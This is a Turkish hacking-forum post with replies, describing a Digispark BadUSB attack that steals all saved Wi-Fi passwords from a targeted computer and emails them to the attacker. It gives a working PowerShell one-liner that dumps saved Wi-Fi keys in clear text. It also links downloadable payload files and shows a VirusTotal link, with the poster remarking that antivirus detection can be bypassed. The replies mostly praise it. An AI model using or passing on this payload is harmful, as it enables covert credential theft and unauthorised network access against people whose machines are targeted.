BadUSB İLE WİFİ HACKLEME - Digispark

Klavye19

Katılımcı Üye
8 Ocak 2017
852
12
BadUSB İLE WİFİ HACKLEME - Digispark

Herkese merhaba
bu videoda digispark kullanarak hedeflediğimiz bilgisayarlarda bulunan tüm wifi şifrelerini istediğimiz mail adresine göndermeyi anlattım.


senaryo şu şekilde

  1. Gmail adresi belirlenir
  2. BadUSB hazırlanır
  3. Hedeflenen bilgisayara takılır
  4. kod çalışır
  5. ve belirlediğimiz mail adresine tüm şifreler iletilir

Gerçekten de kulağa çok iyi geliyor
bu mümkün ve oldukça da basit ilk önce size bağlı olduğumuz wifi şifresini nasıl görebileceğimizi anlatıyım.


İlk önce powershelli açıyoruz ve sadece uzun bir komut yazıyoruz

Kod:
(netsh wlan show profiles) | Select-String “\:(.+)$” | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=”$name” key=clear)} | Select-String “Key Content\W+\:(.+)$” | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize

Kodlar bende gözükmüyor sizde de gözükmüyor ise sağ tık sayfa kaynağını incele dedikten sonra ilgili kısımdan kopyalayın

Ve bumm wifi ismi ve şifresi elimizde hemde clear text yani düz metin olarak görebiliyoruz windows'un bize sağladığı bir kolaylık.

powershell.PNG


Wifi güvenlik protokolünün ne olduğu önemli değil biz ağa bir daha hızlı bir şekilde dahil olabilmemiz için windows bu şifreyi kaydeder aynı android telefonlarda olduğu gibi.

Peki digispark ile bir komut çalıştırıp bunu mail adresimize göndertirebilirmiyiz diye düşündüm ufak bir araştırma yaptığımda Rubber Ducyky için böyle bir payload oluşturulmuş ee gerisi kolay sadece digispark için kodları convert etmem gerek.

Bu basitti hemen convert ettim.

Buradan bağlantıya tıklayıp dosyaları indirebilirsiniz yanlız bu dosyalar bana ait değil ama gayet iyi çalışıyor
https://drive.google.com/open?id=1HDKRnfStugwKKlSzoPlScqei_ZqZybaV

VirusTotal: https://www.virustotal.com/gui/file/ffa3a1834b2c7377059cb59a07ec3a6bfac1493ec4bdfa4117c7318483ddbb34/detection

VirusTotal Bypass edilebiliyor ama zorunlu olduğu için koyuyorum :) :) :)

Dosyaların içerisinde 1 adet ino dosyası ve 2 adet ps1 dosyası ile birde bat dosyası bulunuyor.


Geri kalanınıda videoda izleyelim.

[ame="https://www.youtube.com/watch?v=93HhtRwlHZU&feature=youtu.be"]https://www.youtube.com/watch?v=93HhtRwlHZU&feature=youtu.be[/ame]

 
Son düzenleme:

DarkHawk06

Uzman üye
12 Şub 2016
1,046
8
Pandora
Hocam elinize sağlık. Forumda fiziksel donanım araçlarını görmek çok mutluluk verici , kanalınızdaki bir çok içerik faydalı ve bilgilendirici..
 

mhmt1180

Katılımcı Üye
17 Eki 2013
801
18
Linkleri buraya atsaydın kardeş yanlış anlama herkezin içi rahat etsin eline sağlık bu arada
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.